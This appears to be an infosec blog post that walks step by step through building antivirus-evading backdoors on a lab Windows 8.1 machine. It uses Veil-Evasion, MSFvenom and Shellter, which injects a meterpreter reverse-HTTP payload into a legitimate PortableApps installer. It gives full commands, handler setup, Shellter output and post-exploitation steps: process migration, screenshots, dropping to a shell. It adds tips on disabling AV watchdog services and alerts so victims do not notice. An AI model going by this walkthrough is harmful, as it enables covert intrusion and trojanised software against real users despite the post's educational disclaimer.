ShellCode

Ever want to build a shell army? What about Endpoint Security? What about Anti-malware? Are these really as effective as the user believes? Let’s explore this topic… There is no product on the market that will 100% protect you from 100% of the problems. Its important to have a good antivirus and anti-malware application. These protect you from 99% of the bad stuff found on 95% of the internet. Its all about Percentages… So even if i say i busted this av… It doesn’t mean the anti-virus is useless. It just means i can do something it cannot detect yet… Yet is the Key Phrase…

The First reason i did this was kind of out of making fun of people. Bad huh? I , as well as anyone in infosec, have met too many “users” of devices that feel bullet proof on the net because they have “AV” or “Anti-malware”… Hack.. cough… puke… Lame…… Go find your “Safe Spot” and let the adults work…. It’s just how i feel about it…

So the second reason was to see if I could do it. Why not? If I could get by all of this software and maintain a connection without the user knowing. Did the software really Work?

The third reason I choose these product was due to the fact of money. Each product line costs “X” amount and when I based that with this formula (“25.99 X 3,000,000,000”) that is was a really big number. And if the end user pays 30$ a year should they not get something that works for it? I bought a license for every piece i tested. They got their money, now do i get the protection they promise? Do they live up to statement?

So I decided to build and deploy a shell army to test and see if today’s current Anti-Virus and Anti-Malware Venders could stop me from building a “Shell Army” and give me a backdoor on the user’s machine. I ended up having a mixture of success and failure using Veil-Evasion Framework, Shellter VI (6.0), and MSFvenom.

Veil-Evasion is a really good encoder. With the February upgraded version of PyInstaller, it allows the ability to encrypt the bytecode that pyinstaller outputs.  This feature generates a random key each time Veil-Evasion runs and supply’s that while using PyInstaller to convert the python code into your executable. I will not be going over this as you can read about it here : http://digitalizedwarfare.com/2015/09/26/so-he-said-its-ok-i-got-av-i-said-gtfo/

Shellter is one of my favorites. “Shellter is a dynamic shellcode injection tool. It can be used to inject shellcode into native Windows applications. Shellter is not just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. It never transfers the execution flow to a code cave, or to an added section in the infected PE file. You can write your own shellcode to be encoded or uses something like Metasploit to generate a payload.” This description of shelter is pretty straight forward. I’ll be adding my output at the end of this article.

MsfVenom is a standalone payload generator for Metasploit. It is integrated with Metasploit and also can be run from the cli.  MsfVenom replaces both msfpayload and msfencode as of June 8th, 2015 and is focus around standardization and speed optimization. This has been documented very much in the community. I will not be going over it for length sake.

Each Product line that I tested against had many different options to configure that changed the way the product acted, but came with a “Default” group of options applied. While it is good to have a ton of great features, if the feature isn’t clear, it most likely will not be configured. I left things stock as we wanted to have the “Default User Experience”

I’ll list out the software that I tested on below. I have highlighted my Fav in green. I really like these protects and i felt they were worth the money i paid.

  • Avira
  • Kaspersky
  • Eset
  • Webroot
  • Watch Dog Antivirus
  • Malwarebytes Anti-Malware
  • Malwarebytes Anti-Exploit

With this in mind I decided I wanted to see was how they compared and responded to different type of attacks or malware types.

If I could get a shell on a user’s machine, that means the software product I was using, was either not functioning correctly, or that the software could not detect the technology I was using. These are two very different issues. Sometimes software can be mis-configured to allow bad or suspect applications to do or ignore other conditions. And sometimes the technology cannot read the code do to obfuscation of payloads.

By encoding the bytecode, or obfuscating a python payload, and using stock ports. I found that I could not only install a reverse http script and have the use call back to my machine. When connecting to the session I found that I could migrate processes and do the most basic of spying functions while the anti-virus or anti-malware runs as well.

In my experiments I got different results depending on what I did. Not every attack worked for each different piece of software I tested.  While I was testing on what we consider “Home User” platform, this is possible on “Enterprise” networks to similar extent. Some of the issues that I ran into were

  • Operating Differences
    • “x86 or x64”
    • “Windows or Linux or Mac”
  • Firewall Present
    • “Either Hardware”
    • “Windows Firewall”
    • “Application Firewall”
  • Group Policy’s Present
    • “Network GPO Configured”
    • “Local Configured”

While I found that I had a harder time with Kaspersky and Eset, I had no problem with Avira, and Webroot, and Watch Dog. Eset detected the meterpreter session and Kaspersky identified the encoding. Malwarebytes kicked up some fuss but in the end I found some working paths. I’m sure many people know about these already.

While I did find plenty of things I could not get around, some solutions I found for others would not work for the one I was testing with. Sometimes I found re-encoding a payload more times had more success.  With some applications I found that the protocol I was using for my connection was getting blocked. So using nonstandard ports such as 4444 failed more often than using port 80 or 443.

In addressing the AV on the endpoint i wanted to give you two really important notes. These usually have a Watching service.  This is a service that makes sure the AV or Anti-Malware is up and running. If they see the service not running they will start it. If you cannot stop the running watching service due to protections, DISABLE IT, and REBOOT the machine.

Also remember those popup alerts. If you do not want the user to see the av is not running, disable notifications…. You can check the reg for most types.

I also found that the language the payload use created with mattered very much. Two of the languages I had really good luck with were Ruby and Python.

Here is the Output of Shellter.

PE Target: /root/Downloads/PortableApps.com_Platform_Setup_12.2.paf.exe

**********
* Backup *
**********

Backup: /root/Downloads/PortableApps.c.bak

********************************
* PE Compatibility Information *
********************************

Minimum Supported Windows OS: 5.0

******************
* Packed PE Info *
******************

Status: Possibly Not Packed – The EntryPoint is located in the first section!

***********************
* PE Info Elimination *
***********************

Data: Dll Characteristics (Dynamic ImageBase etc…), Digital Signature.

Status: All related information has been eliminated!

****************
* Tracing Mode *
****************

Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.

Note: Pressing CTRL+C when not in tracing mode will terminate Shellter.

Note2: In Auto Mode, Shellter will trace a random number of instructions for a maximum time of approximately 30 seconds in native Windows
hosts and for 60 seconds when used in Wine.

DisASM.dll was created successfully!

Tracing has been completed successfully!

Tracing Time Approx: 0.68 mins.

Starting First Stage Filtering…

*************************
* First Stage Filtering *
*************************

Filtering Time Approx: 0.0066 mins.

Enable Stealth Mode? (Y/N/H): Y

************
* Payloads *
************

[1] Meterpreter_Reverse_TCP
[2] Meterpreter_Reverse_HTTP
[3] Meterpreter_Reverse_HTTPS
[4] Meterpreter_Bind_TCP
[5] Shell_Reverse_TCP
[6] Shell_Bind_TCP
[7] WinExec

Use a listed payload or custom? (L/C/H): L

Select payload by index: 2

****************************
* meterpreter_reverse_http *
****************************

SET LHOST: 192.168.1.12

SET LPORT: 80

****************
* Payload Info *
****************

Payload: meterpreter_reverse_http

Size: 324 bytes

Reflective Loader: NO

Encoded-Payload Handling: Enabled

Handler Type: IAT

******************
* Encoding Stage *
******************

Encoding Payload: Done!

****************************
* Assembling Decoder Stage *
****************************

Assembling Decoder: Done!

***********************************
* Binding Decoder & Payload Stage *
***********************************

Status: Obfuscating the Decoder using Thread Context Aware Polymorphic
code, and binding it with the payload.

Please wait…

Binding: Done!

*********************
* IAT Handler Stage *
*********************

Fetching IAT Pointers to Memory Manipulation APIs…

0. VirtualAlloc –> N/A
1. VirtualAllocEx –> N/A
2. VirtualProtect –> N/A
3. VirtualProtectEx –> N/A
4. HeapCreate/HeapAlloc –> N/A
5. LoadLibrary/GetProcAddress –> IAT[4080f0]/IAT[4080ec]
6. CreateFileMapping/MapViewOfFile –> N/A

Using Method –> 5

***************************
* IAT Handler Obfuscation *
***************************

Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.

Please wait…

Code Generation Time Approx: 0.000133 mins.

*************************
* PolyMorphic Junk Code *
*************************

Type: Engine

Generating: ~500 bytes of PolyMorphic Junk Code

Please wait…

Generated: 502 bytes

Code Generation Time Approx: 6.67e-005 mins.

Starting Second Stage Filtering…

**************************
* Second Stage Filtering *
**************************

Filtering Time Approx: 0.000333 mins.

*******************
* Injection Stage *
*******************

Virtual Address: 0x4068b8

File Offset: 0x5cb8

Section: .text

Adjusting stub pointers to IAT…

Done!

Adjusting Call Instructions Relative Pointers…

Done!

Injection Completed!

*******************
* PE Checksum Fix *
*******************

Status: Valid PE Checksum has been set!

Original Checksum: 0x3a5e68

Computed Checksum: 0x3a45a5

**********************
* Verification Stage *
**********************

Info: Shellter will verify that the first instruction of the injected code will be reached successfully.
If polymorphic code has been added, then the first instruction refers to that and not to the effective
payload.
Max waiting time: 10 seconds.

Warning!
If the PE target spawns a child process of itself before reaching the injection point, then the injected code will
be executed in that process. In that case Shellter won’t have any control over it during this test.
You know what you are doing, right? ;o)

Injection: Verified!

Press [Enter] to continue…

Shellter is a really good program to inject PE files.. I suggest you take a good look it and apply it to other systems.. IOT, POS, ATM, And even Windows embeded Systems in autos….. Its a big problem…

In closing what I want to say from this research is this.  While there is no solution to every problem that we have on the internet, the best solution may seem to be use the internet with caution. Make sure that you have the most up-to-date software and signatures, and to not install software you so not need. While this takes care of 75% of malware and hacker attacks, it leave too much still on the table.  Caution alone will increase your safety but not to 100%. There is always risk involved.

I have been involved in one way or another in security since the mid to late 80’s. I grew up as a child of the baud. Phone modems and exploring networks were favorite past times for me. Through all these years the only thing that I feel that has changed, is the complexity of the networks we were connecting to. We still see them in the same way, but there are thousands more options and combinations to explore today.

For the last decade or so, I have been working with many large scale enterprise products to evaluate and establish the market readiness of their product line.  My job was to evaluate each step or phase of the product line, and make recommendations back to the creators. This put me in a great spot or position to establish many methodologies involved in exploration and reverse engineering. These are two strong passions of mine.

Through all of this my knowledge of networks, firewalls, the internet, and the dark web exploded.  While not maintaining networks I am involved in the InfoSec Community. I enjoy meeting new and interesting people from different tech stand points. I find that through team work, analysis and brainstorming, that we can find new ways to improve the security of our networks and product line.

In my spare time I host an Internet radio show with my best friend to promote InfoSec and Awareness. We cover topics ranging from security to programing.  I enjoy Hardware Hacking and Exploitation Research. I have an online blog that I write ideas or research for. I have an active twitter account and love to share information with other in InfoSec.

Veil-Evasion is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.
So as usual when i go to a conference i buy a book or two. This year at defcon 23 one of them was “The Hackers Playbook 2” by peter kim. You can follow him on twitter at @HackerPlayBook.

I think one of the great topics in the book was Veil-Evasion of Anti-Virus. I have been in many conversations where the end-user feels safe and secure due to “Thier” Anti-Virus program. Most who feel they are safe are willing to take the extra chance. Veil can prove a costly mistake…

**Disclaimer : This document should be used as educational material and should not be used on hardware or systems that you do not own or are not authorized in writing to do so on.  I take no responsibility for this document or if a monkey beats you in the head with your keyboard while reading it. Its nothing to do with me..

Veil-Evasion is a tool to generate payload executables that bypass common Anti-Virus solutions. Veil-Evasion’s code is located at https://www.github.com/Veil-Framework/Veil-Evasion/ and it’s a part of the Veil super project at https://github.com/Veil-Framework/Veil which we recommend most users clone and install.

At the time of this writing i am using Kali Linux 2.0. This was released at Defcon 23 in 2015.  The following screenshots are using the Veil-Framework Installer from the Kali 2 Menu.  After you run the installer, please got to terminal and type the following

root@kali:~# cd /opt/Veil-Evasion/

Show the contents with this command

root@kali:/opt/Veil-Evasion# ls

Selection_016

now that you’re in the correct folder you can type

root@kali:/opt/Veil-Evasion# ./Veil-Evasion.py

to run veil-evasion. When this loads you should be looking at Veil-Framework

root@kali: -opt-Veil-Evasion_008

Now that you’re in Veil-Evasion, we need to create the PAYLOAD we are going to get our target to run. To select a reverse http connection type

[menu>>]: use python/meterpreter/rev_http

root@kali: -opt-Veil-Evasion_001

Now we need to fill out some options to make sure the payload will run correctly and connect back to our attacking machine. I used the following options to configure mine.

Options to Choose

  1. set LHOST 192.168.1.12
  2. generate

After you select generate you will be asked to name the payload.  In our example we have chosen python_rev_http . This is optional and you do not have to enter anything. It will use the default. If the file already exists it will append a number to it so it does not overwrite the old one. When done please press enter.

root@kali: -opt-Veil-Evasion_002

Next your going to be asked which you want to use. Please chose 1 to use the Pyinstaller

root@kali: -opt-Veil-Evasion_003

after you create the payload with pyinstaller you will get the following screen showing you where the software has been stored, as well as where the metasploit resource file is located. A metasploit resource file contains the options you have selected in the build process. you can run this script later to loads msfconsole in different ways.

root@kali: -opt-Veil-Evasion_004

These lines are important to note

  1.  [*] Executable written to: /usr/share/veil-output/compiled/python_rev_http.exe
  2. Required Options: COMPILE_TO_EXE=Y  LHOST=192.168.1.12  LPORT=8080
  3. Handler File: /usr/share/veil-output/handlers/python_rev_http_handler.rc

The python_rev_http_handler.rc file is kind of like a script you use to auto configure msfconsole.  To bring up a msfconsole with this resource file type

root@kali:~#msfconsole -r /usr/share/veil-output/handlers/python_rev_http_handler.rc

The first thing is that the compiled binary you want to get to your target is locate in/usr/share/veil-output/compiled/python_rev_http.exe.  Your IP address ready to receive connections is 192.168.1.12. And this connection is listening on port 8080.

root@kali: -opt-Veil-Evasion_005

When this has loaded your now listening for incoming connections from end points. On the Target computer we have windows 8.1 pro x64 installed with avira anti-virus and malwarebytes anti-malware. Both are free or trial versions with latest updates installed. As you can see below Avira Anti-Virus with the Latest Updates.

Selection_010

When we scan the file we can see that Avira does not pick up on our back door.

root@kali: -opt-Veil-Evasion_006

As you can see, Avira does not flag our back-door as a virus. So we have made it through Anti-Virus. Now lets run the file and see if Malwarebytes Picks up on the file, or the traffic. Depending on the port you choose to talk back on, the anti-virus anti-malware might detect the traffic as bad.

Selection_009

We have a Successful Session. That means we have by-passed not only the Anti-Virus, but the Anti-Malware application as well. Lets take a look at the target computer and see what we can get with our session. We can connect to the session by running the command. You can also use the command sessions -l to list sessions.

root@kali:~#sessions -i 1

root@kali: -opt-Veil-Evasion_007

The First thing we want to do is to migrate off to a better process. To do that, we use the ps command. This will list the running processes on the target. Look for host process with better priv.

meterpreter >ps

1320  564   svchost.exe
1356  1328  explorer.exe           x64   1        WIN-3D7B4OUKIUU\WinLab  C:\Windows\explorer.exe
1532  1356  python_rev_http.exe    x86   1        WIN-3D7B4OUKIUU\WinLab  Z:\Viel\python_rev_http.exe

We will migrate to explorer.exe To do so we must use the migrate command and then tell it what process ID to attach to. In our case explorer.exe is 1356

meterpreter > migrate 1356
[*] Migrating from 3012 to 1356…
[*] Migration completed successfully.

Now that we have migrated, lets check to see what our current process ID is

meterpreter > getpid
Current pid: 1356

As you can see we have now migrated to explorer.exe.

Now lets see what we can do. I’m not going to go through all the scripts written for this, but i’m gonna show you a few simple commands. The first is how to get a screenshot.

meterpreter > screenshot
Screenshot saved to: /opt/Veil-Evasion/DovoxskX.jpeg

DovoxskX
Now lets see what other information we can get about the target. Lets id the OS with the sysinfo command.

meterpreter > sysinfo
Computer        : WIN-3D7B4OUKIUU
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64

Lets get the IP Address of the Target. We will use the ipconfig command.
meterpreter > ipconfig

Interface  3
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:5e:af:e4
MTU          : 1500
IPv4 Address : 192.168.1.36
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::f9b0:6ff9:5d7f:1837
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface  4
============
Name         : Bluetooth Device (Personal Area Network)
Hardware MAC : 60:d8:19:fc:2f:dc
MTU          : 1500
IPv4 Address : 169.254.213.43
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::59b4:99a9:e3b3:d52b
IPv6 Netmask : ffff:ffff:ffff:ffff::

Next lets See what Privs we have. We will use the getprivs command.

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege

Lets check the firewall status by dropping to shell and running some net commands

meterpreter > shell

after you have a shell type the command below to show firewall status

C:\Windows\system32>netsh firewall show opmode

root@kali: -opt-Veil-Evasion_011

There is a lot more you can do once you get to this point. Some of the things are using post modules to scrape information like password hashes, or user information, all the way to getting domain admin. I’ll write more later on how to better maintain a foothold in various systems later.

Sign In

Reset Your Password